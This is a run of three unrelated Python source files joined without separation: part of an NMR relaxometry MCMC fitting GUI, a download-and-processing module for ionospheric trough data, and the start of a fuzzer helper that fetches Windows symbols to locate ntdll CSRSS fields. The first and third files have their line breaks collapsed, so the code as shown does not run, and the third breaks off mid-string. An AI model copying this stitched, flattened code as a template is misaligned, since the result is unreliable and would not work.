MCMC.nWalkerCheck(Nwalker_b, len(ParamFile.Names['OrderParam']) + len(ParamFile.Names['CorrTimes'])+len(ParamFile.Names['others'])+1) GUI.TauC = 
float(self.TauC.get()) GUI.OP = self.OP GUI.CT = self.CT GUI.Others = self.Others GUI.TotParam = [] for i in self.OP: GUI.TotParam.append(i) for i in self.CT: GUI.TotParam.append(i) for i in self.Others: GUI.TotParam.append(i) GUI.AccelerationType = str(self.AccelerationTYPE.get()) GUI.PDB = self.PDBid.get() if len(GUI.PDB) == 4: GUI.checkPDB = True else: GUI.checkPDB = False ExperimentalSetUp = open(ExperimentalSetUpPath, "r") #this is a file containing the experiment number, the height (LF value), d22 (stab LF), d25 (stab HF), WTHF (response time), shuttle LF (time of shuttling to LF), WTLF, shuttle HF and VC (time spent at LF) FieldCalibration = open(FieldCalibrationPath, "r") #This is a file containing the height and the corresponding field with FieldCalibration as input: FC = list(zip(*(line.strip().split("\t") for line in input))) FC = [[float(FC[col][line]) for col in range(2)] for line in range(len(FC[0]))] #it is a one column vector containing the height and the field at each position heights = [FC[col][0] for col in range(len(FC))] fields = [FC[col][1] for col in range(len(FC))] higherHeights = [] lowerHeights = [] middleHeights = [] middleFields = [] higherFields = [] lowerFields = [] for i in range(len(heights)): if heights[i] <= 0.47: higherHeights.append(heights[i]) higherFields.append(fields[i]) else: if heights[i] <= 0.6: middleHeights.append(heights[i]) middleFields.append(fields[i]) else: lowerHeights.append(heights[i]) lowerFields.append(fields[i]) GUI.HigherCoefs = np.polyfit(higherHeights, higherFields, 10) GUI.MiddleCoefs = np.polyfit(middleHeights, middleFields, 5) GUI.LowerCoefs = np.polyfit(lowerHeights, lowerFields, 10) #BO Files HFfiles = [] HFtypes = [] AllFields = [] for i in range(len(self.RelaxationDataSet)): HFfiles.append(self.RATES[i]) HFtypes.append(str(self.RelaxationDataType[i].get())) AllFields.append(float(self.Fields[i].get())) UsedFields = [] for i in AllFields: if i not in UsedFields: UsedFields.append(i) GUI.B0HFields_int 
= [] targetLength = len(UsedFields) while len(GUI.B0HFields_int) != targetLength: GUI.B0HFields_int.append(max(UsedFields)) UsedFields.remove(max(UsedFields)) numberExp = sum(1 for line in ExperimentalSetUp) ExperimentalSetUp.close() ExperimentalSetUp = open(ExperimentalSetUpPath, "r") GUI.ExperimentNumber = [[] for i in range(numberExp)] GUI.Height = [[] for i in range(numberExp)] GUI.d22 = [[] for i in range(numberExp)] GUI.d25 = [[] for i in range(numberExp)] GUI.WTHF = [[] for i in range(numberExp)] GUI.SLF = [[] for i in range(numberExp)] GUI.WTLF = [[] for i in range(numberExp)] GUI.SHF = [[] for i in range(numberExp)] GUI.VC = [[] for i in range(numberExp)] for i in range(numberExp): Line = ExperimentalSetUp.readline() Line = [x for x in Line.split('\n')] Line = Line[0] Line = [x for x in Line.split('\t')] Line = [float(col) for col in Line] GUI.ExperimentNumber[i] = int(Line[0]) GUI.Height[i] = Line[1] GUI.d22[i] = Line[2] * 1e-3 GUI.d25[i] = Line[3] * 1e-3 GUI.WTHF[i] = Line[4] * 1e-3 GUI.SLF[i] = Line[5] * 1e-3 GUI.WTLF[i] = Line[6] * 1e-3 GUI.SHF[i] = Line[7] * 1e-3 vc = [] for j in range(len(Line)-8): vc.append(Line[j+8] * 1e-3) GUI.VC[i] = vc GUI.B0LFields_Int = [[] for i in range(numberExp)] for i in range(len(GUI.Height)): GUI.B0LFields_Int[i] = FitF.B0Fit(GUI.Height[i], GUI.LowerCoefs, GUI.MiddleCoefs, GUI.HigherCoefs) GUI.MagField = FitF.B0Fit(0.0, GUI.LowerCoefs, GUI.MiddleCoefs, GUI.HigherCoefs) #Plot the field profile with the considered fields during relaxometry FigOut.PlotFieldProfile(heights, GUI.LowerCoefs, GUI.MiddleCoefs, GUI.HigherCoefs, GUI.B0LFields_Int, fields, dirFitOutput) #HF Relaxation rates Files HFfiles_orga = [[[] for j in GUI.B0HFields_int] for i in ParamFile.RelaxationRates] HFields_orga = [[[] for j in GUI.B0HFields_int] for i in ParamFile.RelaxationRates] for i in range(len(HFfiles)): posType = ParamFile.RelaxationRates.index(HFtypes[i]) posField = GUI.B0HFields_int.index(AllFields[i]) 
HFfiles_orga[posType][posField].append(HFfiles[i]) HFields_orga[posType][posField].append(AllFields[i]) #Amino Acids number list nAA = sum(1 for line in open(HFfiles[0])) GUI.AAList = [] for line in open(HFfiles[0]): line = line.split("\n") line = line[0] line = line.split("\t") GUI.AAList.append(int(line[0])) #create the average HFdata list GUI.HFdata = [[[] for i in ParamFile.RelaxationRates] for k in GUI.AAList] GUI.B0HFields = [[[] for i in ParamFile.RelaxationRates] for k in GUI.AAList] for RelaxType in range(len(ParamFile.RelaxationRates)): for HField in range(len(HFfiles_orga[RelaxType])): ndata = [0.0 for i in range(nAA)] for i in range(len(HFfiles_orga[RelaxType][HField])): file = open(HFfiles_orga[RelaxType][HField][i], 'r') with file as input: Filedata = list(zip(*(line.strip().split("\t") for line in input))) for AA in range(nAA): if Filedata[1][AA] != 'NA': ndata[AA] += 1.0 if i == 0: GUI.HFdata[AA][RelaxType].append([int(Filedata[0][AA]), float(Filedata[1][AA]), float(Filedata[2][AA])]) GUI.B0HFields[AA][RelaxType].append(float(HFields_orga[RelaxType][HField][0])) else: GUI.HFdata[AA][RelaxType][-1][1] = float(GUI.HFdata[AA][RelaxType][-1][1]) + float(Filedata[1][AA]) GUI.HFdata[AA][RelaxType][-1][2] = float(GUI.HFdata[AA][RelaxType][-1][2]) + float(Filedata[2][AA]) file.close() for AA in range(nAA): if ndata[AA] != 0.0: GUI.HFdata[AA][RelaxType][-1][1] = float(GUI.HFdata[AA][RelaxType][-1][1])/ndata[AA] GUI.HFdata[AA][RelaxType][-1][2] = float(GUI.HFdata[AA][RelaxType][-1][2])/ndata[AA] #LF intensities dirIntRelax = dirInput + "/RelaxometryIntensities" os.makedirs(dirIntRelax) GUI.Intensities = [[] for AA in GUI.AAList] GUI.B0LFields = [[] for AA in GUI.AAList] for n in range(len(GUI.ExperimentNumber)): InterensityFile = self.Intrelax + "/" + str(int(GUI.ExperimentNumber[n])) + ".txt" if os.path.isfile(InterensityFile): destFile = dirIntRelax + "/" + str(int(GUI.ExperimentNumber[n])) + ".txt" copyfile(InterensityFile, destFile) AA = 0 for line in 
open(InterensityFile): L = line.split("\n") L = L[0] L = L.split("\t") if int(2*len(GUI.VC[n])+1) != len(L): print("") print("Eperiment number " + str(int(GUI.ExperimentNumber[n])) + " does not have the correct number of intensities") print("") sys.exit() else: ToAdd = [] for vc in range(int((len(L)-1)/2)): if L[vc*2+1] != "NA": ToAdd.append([int(L[0]), float(L[vc*2+1]), float(L[vc*2+2])]) else: ToAdd.append([int(L[0]), "NA", "NA"]) if len(ToAdd) != 0: GUI.B0LFields[AA].append(FitF.B0Fit(GUI.Height[n], GUI.LowerCoefs, GUI.MiddleCoefs, GUI.HigherCoefs)) GUI.Intensities[AA].append(ToAdd) AA += 1 else: print("") print("Missing the eperiment number " + str(int(GUI.ExperimentNumber[n])) + " file") print("") sys.exit() #Other inputs InputF = open(GUI.InputPath, "r") with InputF as input: inputL = list(zip(*(line.strip().split('\t') for line in input))) GUI.OtherInputs = [[] for AA in GUI.AAList] for AA in range(len(GUI.AAList)): listOtherInputs = [] for i in range(len(inputL)-1): listOtherInputs.append(float(inputL[1+i][AA])) GUI.OtherInputs[AA] = [float(inputL[0][AA]), listOtherInputs] #Write the Parameters file loadFile = dirInput + "/Parameters.txt" GUI.bnds = Out.writeParam(self, loadFile, GUI.TauC, GUI.AccelerationType, GUI.Nmcmc, GUI.Nwalker, GUI.checkPDB, GUI.PDB, ExperimentalSetUpPath, FieldCalibrationPath, self.Intrelax, GUI.InputPath) self.PositionR1 = 0 for i in range(len(self.RelaxFunc)): if ParamFile.RelaxationRates[i] != "R1": self.PositionR1 += 1 break GUI.PositionR1 = self.PositionR1 GUI.RelaxFunc = self.RelaxFunc Calculations() class Calculations(GUI): def __init__(self): self.FieldLists() def FieldLists(self): #################################################### Preparation before MCMC #################################################### print("") print("Optimizing shuttling time increment...") self.LFtimes = [[self.d22[wtlf] + self.WTLF[wtlf] + self.VC[wtlf][vc] for vc in range(len(self.VC[wtlf]))] for wtlf in range(len(self.WTLF))] posLowField = 
self.B0LFields[0].index(min(self.B0LFields[0])) RandomParam = [[] for i in range(10)] for i in range(10): for P in range(len(self.TotParam)): RandomParam[i].append(uniform(self.bnds[P][0], self.bnds[P][1])) self.Increment = ShSim.optShuttling(self, posLowField, np.array(RandomParam), ParamFile.PositionAuto) self.FieldListUp, self.FieldListDown = ShSim.FieldList(self, self.Increment) print("Final used increment: ", self.Increment, " s") print("") print("Choosing propagator calculation method...") refRM = np.asarray(_RelaxMat.RelaxMat(5.0, RandomParam[0], self.TauC, self.OtherInputs[0][1])[0]) print(" Method 1") start = time.time() for i in range(10000): linalg.expm(-refRM) end = time.time() Duration1 = end-start print(" time for 10,000 iterations: ", round(Duration1, 1), " s") print(" Method 2") start = time.time() for i in range(10000): eig, eigvec = np.linalg.eig(refRM) eigvec @ np.diag(np.exp(-eig)) @ np.linalg.inv(eigvec) end = time.time() Duration2 = end-start print(" time for 10,000 iterations: ", round(Duration2, 1), " s") if min(Duration1, Duration2) == Duration1: self.PropFunction = ShSim.PropCalExp print("Choosing calculation method done. Method 1 chosen.") else: self.PropFunction = ShSim.PropCalDiag print("Choosing calculation method done. 
Method 2 chosen.") self.MCMCcalculations() def MCMCcalculations(self): FigMCMCcorrFolder = self.directoryName + "/FittingResults/Correlations" FigMCMCtrajFolder = self.directoryName + "/FittingResults/Trajectories" FigIntensities = self.directoryName + "/FittingResults/Intensities" os.makedirs(FigMCMCcorrFolder) os.makedirs(FigMCMCtrajFolder) os.makedirs(FigIntensities) self.MCMCparam = [[] for AA in self.AAList] self.Acceptance = [[] for AA in self.AAList] self.FinalSimulatedIntensities = [[] for AA in self.AAList] self.R1LFDataForCurve_BackCalc = [[] for i in self.AAList] self.R1LFDataForCurve_Fitted = [[] for i in self.AAList] self.ScalingIntensities = [[] for i in self.AAList] nParam = len(ParamFile.Names['OrderParam']) + len(ParamFile.Names['CorrTimes'])+len(ParamFile.Names['others'])+1 print("") print("Monte Carlo") for AA in range(len(self.AAList)): print("") print(" Residue ", self.AAList[AA]) print("") self.MCMCparam[AA], self.Acceptance[AA], FullTraj = MCMC.MarkovChainMonteCarlo(FigMCMCcorrFolder, FigMCMCtrajFolder, self.Intensities[AA], self.HFdata[AA], self.B0HFields[AA], self.TauC, self.OtherInputs[AA][1], self.MagField, self.Increment, self.FieldListUp, self.FieldListDown, self.ExperimentNumber, self.WTHF, self.d25, self.LFtimes, self.B0LFields[AA], self.Nwalker, self.Nmcmc, self.bnds, self.TotParam, self.AAList[AA], self.PropFunction, nParam) self.FinalSimulatedIntensities[AA] = self.PropFunction(np.array(self.MCMCparam[AA][0][:-1]), self.TauC, np.array(self.OtherInputs[AA][1]), self.MagField, self.Increment, self.FieldListUp, self.FieldListDown, self.ExperimentNumber, self.WTHF, self.d25, self.LFtimes, self.B0LFields[AA], ParamFile.PositionAuto) Out.WriteMCMCTraj(self, FullTraj, self.AAList[AA]) #file containing the MCMC trajectories print("") print(" Making figures") print("") #Draw the intensities self.ScalingIntensities[AA] = MCMC.ScalingFactor(self.FinalSimulatedIntensities[AA], self.Intensities[AA]) timeForSim = 
[np.linspace(min(self.LFtimes[LField])-min(self.VC[LField]), max(self.LFtimes[LField]), 100) for LField in range(len(self.VC))] timeForSim_Plot = [np.linspace(0.0, max(self.VC[LField]), 100) for LField in range(len(self.VC))] FinalSimulatedIntensitiesFull = self.PropFunction(np.array(self.MCMCparam[AA][0][:-1]), self.TauC, np.array(self.OtherInputs[AA][1]), self.MagField, self.Increment, self.FieldListUp, self.FieldListDown, self.ExperimentNumber, self.WTHF, self.d25, timeForSim, self.B0LFields[AA], ParamFile.PositionAuto) BackIntensities = [[self.ScalingIntensities[AA][LField]*FinalSimulatedIntensitiesFull[LField][t] for t in range(len(FinalSimulatedIntensitiesFull[LField]))] for LField in range(len(self.B0LFields[AA]))] IntensitiesFigFolder = FigIntensities + "/Residue" + str(self.AAList[AA]) os.makedirs(IntensitiesFigFolder) IntensitiesForPlot = [[] for LF in range(len(self.Intensities[AA]))] IntensitiesErrForPlot = [[] for LF in range(len(self.Intensities[AA]))] DelaysForPlot = [[] for LF in range(len(self.Intensities[AA]))] for LF in range(len(self.Intensities[AA])): for VC in range(len(self.Intensities[AA][LF])): if self.Intensities[AA][LF][VC][1] != "NA": IntensitiesForPlot[LF].append(self.Intensities[AA][LF][VC][1]) IntensitiesErrForPlot[LF].append(self.Intensities[AA][LF][VC][2]) DelaysForPlot[LF].append(self.VC[LF][VC]) FigOut.PlotIntensities(self, BackIntensities, IntensitiesFigFolder, IntensitiesForPlot, IntensitiesErrForPlot, DelaysForPlot, timeForSim_Plot, AA) #Draw the relaxation rates for LField in range(len(self.B0LFields[AA])): self.R1LFDataForCurve_BackCalc[AA].append(self.RelaxFunc[self.PositionR1](self.B0LFields[AA][LField], self.MCMCparam[AA][0][:-1], self.TauC, self.OtherInputs[AA][1])[0]) ParamOpt, ParamCov = curve_fit(FitF.exp, np.asarray(self.VC[LField]), np.asarray(self.Intensities[AA][LField])[:,1]) self.R1LFDataForCurve_Fitted[AA].append([self.B0LFields[AA][LField], ParamOpt[0]]) yRateMesHF = [[] for i in ParamFile.RelaxationRates] 
yRateErrMesHF = [[] for i in ParamFile.RelaxationRates] ResiHF = [[] for i in ParamFile.RelaxationRates] xB0HF = [[] for i in ParamFile.RelaxationRates] for RelaxRate in range(len(ParamFile.RelaxationRates)): for HField in range(len(self.B0HFields[AA][RelaxRate])): yRateMesHF[RelaxRate].append(self.HFdata[AA][RelaxRate][HField][1]) yRateErrMesHF[RelaxRate].append(self.HFdata[AA][RelaxRate][HField][2]) xB0HF[RelaxRate].append(self.B0HFields[AA][RelaxRate][HField]) ResiHF[RelaxRate].append(self.HFdata[AA][RelaxRate][HField][1] - self.RelaxFunc[RelaxRate](self.B0HFields[AA][RelaxRate][HField], self.MCMCparam[AA][0][:-1], self.TauC, self.OtherInputs[AA][1])[0]) minLF = min(self.B0LFields[AA]) maxHF = 25.0 xFields = np.logspace(np.log(minLF)/np.log(10.), np.log(maxHF)/np.log(10.), 100) xFieldsHF = np.linspace(8., maxHF, 100) for RelaxRate in range(len(ParamFile.RelaxationRates)): if RelaxRate == self.PositionR1: yback = [self.RelaxFunc[self.PositionR1](B0, self.MCMCparam[AA][0][:-1], self.TauC, self.OtherInputs[AA][1])[0] for B0 in xFields] FigOut.PlotR1(self, xB0HF[self.PositionR1], ResiHF[self.PositionR1], yRateMesHF[self.PositionR1], yRateErrMesHF[self.PositionR1], yback, xFields, AA) else: yback = [self.RelaxFunc[RelaxRate](B0, self.MCMCparam[AA][0][:-1], self.TauC, self.OtherInputs[AA][1])[0] for B0 in xFieldsHF] FigOut.PlotRate(self, xB0HF[RelaxRate], ResiHF[RelaxRate], yRateMesHF[RelaxRate], yRateErrMesHF[RelaxRate], ParamFile.RelaxationRates[RelaxRate], yback, xFieldsHF, AA) print("") self.WriteResult() def WriteResult(self): LAAList = len(self.AAList) print("") print("Writing final results...") #Put together figures already done F = self.directoryName + "/FittingResults" if len(self.AAList) > 1: FigOut.Convert(F + "/Correlations", "AllCorrelations.pdf", "png", False) FigOut.Convert(F + "/Trajectories", "AllTrajectories.pdf", "png", False) for AA in range(len(self.AAList)): F1 = F + "/Intensities/Residue" + str(self.AAList[AA]) FigOut.Convert(F1, 
"AllDecays_Residue" + str(self.AAList[AA]) + ".pdf", "png", True) dirFigs = self.directoryName + "/PlotParameters" os.makedirs(dirFigs) Out.WriteMCMCParam(self) #file containing the parameters of the spectral density function extracted from the MCCM #Draw the Chi2 AllChi2 = [[] for i in self.AAList] for AA in range(LAAList): AllChi2[AA] = FitF.Chi2TOT(self.MCMCparam[AA][0][:-1], self.FinalSimulatedIntensities[AA], self.Intensities[AA], self.HFdata[AA], self.B0HFields[AA], self.TauC, self.OtherInputs[AA][1]) FigOut.PlotChi2(dirFigs, AllChi2, self.AAList) #Draw the spetral density function parameters for param in range(len(self.TotParam)): paramForPlot = [self.MCMCparam[AA][0][param] for AA in range(len(self.AAList))] ErrForPlot = [(self.MCMCparam[AA][1][param]+self.MCMCparam[AA][2][param])/2.0 for AA in range(len(self.AAList))] FigOut.PlotDynParam(dirFigs, paramForPlot, ErrForPlot, self.TotParam[param], self.AAList) #Write the LF R1 Out.WriteLFR1(self) #file containing the scaling factors for intensities, back-calculated and fitted low field R1 if len(self.AAList) > 1: F = self.directoryName + "/FitAllResidues/" for Rate in range(len(ParamFile.RelaxationRates)): F1 = F + str(ParamFile.RelaxationRates[Rate]) FigOut.Convert(F1, "All" + str(ParamFile.RelaxationRates[Rate]) + ".pdf", "png", True) #Write the PDB files if self.checkPDB: Out.WritePDB(self, AllChi2) print(" Writing results: Done") print("") end = time.strftime("%H") + "H" + time.strftime("%M") print("Started at: " + self.begin) print("Ended at: " + end) sys.exit(0) if __name__ == "__main__": root = tk.Tk() GUI(root) root.mainloop()
"""Command entry points for downloading, processing, and labeling trough data."""
import logging
from datetime import datetime, timedelta
from pathlib import Path

from trough import config
from trough import _download, _tec, _arb, _omni, _trough

logger = logging.getLogger(__name__)


def download_tec(start_date, end_date):
    """Download Madrigal TEC files covering [start_date, end_date]."""
    user_data = [config.madrigal_user_name, config.madrigal_user_email, config.madrigal_user_affil]
    logger.info(f"running 'download_tec', start date: {start_date}, end date: {end_date}, user data: {user_data}")
    tec_downloader = _download.MadrigalTecDownloader(config.download_tec_dir, *user_data)
    tec_downloader.download(start_date, end_date)
    logger.info("'download_tec' completed")


def download_arb(start_date, end_date):
    """Download auroral-boundary (ARB) files covering [start_date, end_date]."""
    logger.info(f"running 'download_arb', start date: {start_date}, end date: {end_date}")
    arb_downloader = _download.ArbDownloader(config.download_arb_dir)
    arb_downloader.download(start_date, end_date)
    logger.info("'download_arb' completed")


def download_omni(start_date, end_date):
    """Download OMNI solar-wind data covering [start_date, end_date]."""
    logger.info(f"running 'download_omni', start date: {start_date}, end date: {end_date}")
    omni_downloader = _download.OmniDownloader(config.download_omni_dir, config.nasa_spdf_download_method)
    omni_downloader.download(start_date, end_date)
    logger.info("'download_omni' completed")


def download_all(start_date, end_date):
    """Run every downloader (TEC, ARB, OMNI) over the same interval."""
    for step in (download_tec, download_arb, download_omni):
        step(start_date, end_date)


def process_tec(start_date, end_date):
    """Process the TEC dataset; optionally delete raw downloads in the interval."""
    logger.info("running 'process_tec'")
    _tec.process_tec_dataset(start_date, end_date)
    if config.keep_download:
        return
    # Remove only the raw files whose parsed date falls inside the processed window.
    for h5_file in Path(config.download_tec_dir).glob("*.hdf5"):
        if start_date <= _tec.parse_madrigal_fn(h5_file) <= end_date:
            h5_file.unlink()


def process_arb(start_date, end_date):
    """Process the auroral-boundary dataset; optionally delete raw downloads."""
    logger.info("running 'process_arb'")
    _arb.process_auroral_boundary_dataset(start_date, end_date)
    if config.keep_download:
        return
    for nc_file in Path(config.download_arb_dir).glob("*.NC"):
        _sat_name, file_date = _arb.parse_arb_fn(nc_file)
        if start_date <= file_date <= end_date:
            nc_file.unlink()


def process_omni(start_date, end_date):
    """Process the OMNI dataset (dates accepted for interface symmetry; unused)."""
    logger.info("running 'process_omni'")
    _omni.process_omni_dataset(config.download_omni_dir, Path(config.processed_omni_file))


def process_all(start_date, end_date):
    """Run every processing step over the same interval."""
    logger.info("running 'process_all'")
    for step in (process_tec, process_arb, process_omni):
        step(start_date, end_date)


def label_trough(start_date, end_date):
    """Label the trough over the processed dataset."""
    logger.info("running 'label_trough'")
    _trough.label_trough_dataset(start_date, end_date)


def full_run(start_date, end_date):
    """Download, process, and label everything, chunking TEC/ARB work by year."""
    logger.info("running 'full_run'")
    for year in range(start_date.year, end_date.year + 1):
        chunk_start = max(start_date, datetime(year, 1, 1))
        chunk_end = min(end_date, datetime(year + 1, 1, 1))
        # Skip degenerate chunks (less than an hour of data in this year).
        if chunk_end - chunk_start > timedelta(hours=1):
            download_tec(chunk_start, chunk_end)
            process_tec(chunk_start, chunk_end)
            download_arb(chunk_start, chunk_end)
            process_arb(chunk_start, chunk_end)
    # OMNI and labeling operate on the full requested interval at once.
    download_omni(start_date, end_date)
    process_omni(start_date, end_date)
    label_trough(start_date, end_date)
<reponame>khang06/winnie<filename>forklib/gen_csrss_offsets.py # This tool generates csrss_offsets.py by downloading and # parsing symbols from the Microsoft symbol server. # Requirements: construct, pefile # Run with python2, NOT PYTHON3! import sys, os if not (sys.maxsize > 2**32) and os.name == 'nt': print('Sorry, 32-bit python is not supported because of WOW64 redirection. Please use 64-bit python') raise ValueError('Unsupported python version') if sys.version_info >= (3, 0): print("Sorry, python3 isn't supported") raise ValueError('Unsupported python version') import os.path from pefile import PE from shutil import copyfileobj from pdbparse.peinfo import * try: from urllib.parse import urlparse, urlencode from urllib.request import urlopen, Request, build_opener, FancyURLopener from urllib.error import HTTPError except ImportError: from urlparse import urlparse from urllib import urlencode from urllib2 import urlopen, Request, HTTPError, build_opener from urllib import FancyURLopener #SYM_URL = 'http://symbols.mozilla.org/firefox' SYM_URLS = ['http://msdl.microsoft.com/download/symbols'] USER_AGENT = "Microsoft-Symbol-Server/6.11.0001.404" class PDBOpener(FancyURLopener): version = USER_AGENT def http_error_default(self, url, fp, errcode, errmsg, headers): if errcode == 404: raise HTTPError(url, errcode, errmsg, headers, fp) else: FancyURLopener.http_error_default(url, fp, errcode, errmsg, headers) lastprog = None def progress(blocks, blocksz, totalsz): global lastprog if lastprog is None: sys.stderr.write("Connected. Downloading data..." 
+ "\n") percent = int((100 * (blocks * blocksz) / float(totalsz))) if lastprog != percent and percent % 5 == 0: sys.stderr.write("%d%%" % percent + "\n") lastprog = percent sys.stdout.flush() def download_file(guid, fname, path = None, quiet = False): if path is None: import tempfile path = tempfile.gettempdir() outfile = os.path.join(path, fname) if os.path.isfile(outfile): sys.stderr.write(outfile + ' already exists\n') return outfile ''' Download the symbols specified by guid and filename. Note that 'guid' must be the GUID from the executable with the dashes removed *AND* the Age field appended. The resulting file will be saved to the path argument, which default to the current directory. ''' # A normal GUID is 32 bytes. With the age field appended # the GUID argument should therefore be longer to be valid. # Exception: old-style PEs without a debug section use # TimeDateStamp+SizeOfImage if len(guid) == 32: sys.stderr.write("Warning: GUID is too short to be valid. Did you append the Age field?" 
+ "\n") for sym_url in SYM_URLS: url = sym_url + "/%s/%s/" % (fname, guid) opener = build_opener() # Whatever extension the user has supplied it must be replaced with .pd_ tries = [fname[:-1] + '_', fname] for t in tries: if not quiet: sys.stderr.write("Trying %s" % (url + t) + "\n") outfile = os.path.join(path, t) try: hook = None if quiet else progress PDBOpener().retrieve(url + t, outfile, reporthook = hook) if not quiet: sys.stderr.write("\n") sys.stderr.write("Saved symbols to %s" % (outfile) + "\n") return outfile except HTTPError as e: if not quiet: sys.stderr.write("HTTP error %u" % (e.code) + "\n") return None def handle_pe(pe_file): dbgdata, tp = get_pe_debug_data(pe_file) if tp == "IMAGE_DEBUG_TYPE_CODEVIEW": # XP+ if dbgdata[:4] == b"RSDS": (guid, filename) = get_rsds(dbgdata) elif dbgdata[:4] == b"NB10": (guid, filename) = get_nb10(dbgdata) else: sys.stderr.write("ERR: CodeView section not NB10 or RSDS" + "\n") return guid = guid.upper() saved_file = download_file(guid, filename) elif tp == "IMAGE_DEBUG_TYPE_MISC": # Win2k # Get the .dbg file guid = get_pe_guid(pe_file) guid = guid.upper() filename = get_dbg_fname(dbgdata) saved_file = download_file(guid, filename) # Extract it if it's compressed # Note: requires cabextract! 
if saved_file.endswith("_"): os.system("cabextract %s" % saved_file) saved_file = saved_file.replace('.db_', '.dbg') from pdbparse.dbgold import DbgFile dbgfile = DbgFile.parse_stream(open(saved_file, 'rb')) cv_entry = [d for d in dbgfile.IMAGE_DEBUG_DIRECTORY if d.Type == "IMAGE_DEBUG_TYPE_CODEVIEW"][0] if cv_entry.Data[:4] == b"NB09": return elif cv_entry.Data[:4] == b"NB10": (guid, filename) = get_nb10(cv_entry.Data) guid = guid.upper() saved_file = download_file(guid, filename) else: sys.stderr.write("WARN: DBG file received from symbol server has unknown CodeView section" + "\n") return else: sys.stderr.write("Unknown type:", tp + "\n") return if saved_file != None and saved_file.endswith("_"): os.system("cabextract %s" % saved_file) return saved_file def get_pe_from_pe(filename, symname = None): guid = get_pe_guid(filename) if symname is None: symname = os.path.basename(filename) saved_file = download_file(guid, symname) if saved_file and saved_file.endswith("_"): os.system("cabextract %s" % saved_file) """ These fields need to be zeroed: System32/ntdll.dll .data:00000001801798A8 CsrServerApiRoutine dq ? ; DATA XREF: RtlRegisterThreadWithCsrss+46 .data:00000001801798A8 ; RtlRegisterThreadWithCsrss+93 ... .data:00000001801798B0 CsrClientProcess db ? ; DATA XREF: RtlRegisterThreadWithCsrss+1B .data:00000001801798B0 ; CsrClientConnectToServer+89 ... .data:00000001801798B1 CsrInitOnceDone db ? ; DATA XREF: RtlRegisterThreadWithCsrss:loc_180014D6E .data:00000001801798B1 ; CsrClientConnectToServer:loc_180078AF3 ... .data:00000001801798B2 align 20h .data:00000001801798C0 CsrPortName dw ? ; DATA XREF: CsrpConnectToServer+103 .data:00000001801798C0 ; CsrpConnectToServer+10A ... .data:00000001801798C2 word_1801798C2 dw ? ; DATA XREF: CsrpConnectToServer+7D .data:00000001801798C4 align 8 .data:00000001801798C8 qword_1801798C8 dq ? ; DATA XREF: CsrpConnectToServer+8A .data:00000001801798C8 ; CsrpConnectToServer+F1 ... .data:00000001801798D0 CsrProcessId dq ? 
; DATA XREF: CsrpConnectToServer+320 .data:00000001801798D0 ; CsrGetProcessId .data:00000001801798D8 CsrReadOnlySharedMemorySize dq ? ; DATA XREF: CsrpConnectToServer+315 .data:00000001801798D8 ; CsrVerifyRegion+20 .data:00000001801798E0 CsrPortMemoryRemoteDelta dq ? ; DATA XREF: CsrpConnectToServer+32F .data:00000001801798E0 ; CsrClientCallServer+80 ... .data:00000001801798E8 ; HANDLE CsrPortHandle .data:00000001801798E8 CsrPortHandle dq ? ; DATA XREF: CsrClientConnectToServer+AF .data:00000001801798E8 ; CsrpConnectToServer+240 ... .data:00000001801798F0 CsrPortHeap dq ? ; DATA XREF: CsrClientConnectToServer+193 .data:00000001801798F0 ; CsrpConnectToServer+378 ... .data:00000001801798F8 CsrPortBaseTag dd ? ; DATA XREF: CsrClientConnectToServer+19F .data:00000001801798F8 ; CsrpConnectToServer+388 ... .data:00000001801798FC align 20h .data:0000000180179900 CsrHeap dq ? ; DATA XREF: CsrClientConnectToServer+56 .data:0000000180179900 ; CsrpConnectToServer+76 ... .data:0000000180179908 align 20h .data:0000000180179920 HotPatchSpareGlobals db ? ; SysWOW64/ntdll.dll .data:4B3A7FF4 _CsrServerApiRoutine dd ? ; DATA XREF: RtlRegisterThreadWithCsrss()+6EC60 .data:4B3A7FF4 ; RtlRegisterThreadWithCsrss()+6EC85 .data:4B3A7FF8 _CsrClientProcess db ? ; DATA XREF: CsrClientConnectToServer(x,x,x,x,x)+28 .data:4B3A7FF8 ; RtlRegisterThreadWithCsrss():loc_4B31D554 .data:4B3A7FF9 _CsrInitOnceDone db ? ; DATA XREF: RtlRegisterThreadWithCsrss()+1F .data:4B3A7FFA align 10h .data:4B3A8000 _HotPatchSpareGlobals db ? 
; """ import pdbparse def symbol_addresses(pdb,base=0): from operator import itemgetter, attrgetter class DummyOmap(object): def remap(self, addr): return addr addrs = {} try: # Do this the hard way to avoid having to load # the types stream in mammoth PDB files pdb.STREAM_DBI.load() pdb._update_names() pdb.STREAM_GSYM = pdb.STREAM_GSYM.reload() if pdb.STREAM_GSYM.size: pdb.STREAM_GSYM.load() pdb.STREAM_SECT_HDR = pdb.STREAM_SECT_HDR.reload() pdb.STREAM_SECT_HDR.load() # These are the dicey ones pdb.STREAM_OMAP_FROM_SRC = pdb.STREAM_OMAP_FROM_SRC.reload() pdb.STREAM_OMAP_FROM_SRC.load() pdb.STREAM_SECT_HDR_ORIG = pdb.STREAM_SECT_HDR_ORIG.reload() pdb.STREAM_SECT_HDR_ORIG.load() except AttributeError as e: pass # except Exception as e: # print ("WARN: error %s parsing %s, skipping" % (e,pdbbase)) # not_found.append( (base, pdbbase) ) # continue try: sects = pdb.STREAM_SECT_HDR_ORIG.sections omap = pdb.STREAM_OMAP_FROM_SRC except AttributeError as e: # In this case there is no OMAP, so we use the given section # headers and use the identity function for omap.remap sects = pdb.STREAM_SECT_HDR.sections omap = DummyOmap() gsyms = pdb.STREAM_GSYM if not hasattr(gsyms, 'globals'): gsyms.globals = [] last_sect = max(sects, key = attrgetter('VirtualAddress')) limit = base + last_sect.VirtualAddress + last_sect.Misc.VirtualSize for sym in gsyms.globals: if not hasattr(sym, 'offset'): continue off = sym.offset try: virt_base = sects[sym.segment - 1].VirtualAddress except IndexError: continue mapped = omap.remap(off + virt_base) + base addrs[sym.name]=mapped return addrs def main(): import platform genfile = 'csrss_offsets.h' me = os.path.basename(__file__) f = open(genfile, 'w') f.write('// This file was generated by a tool. 
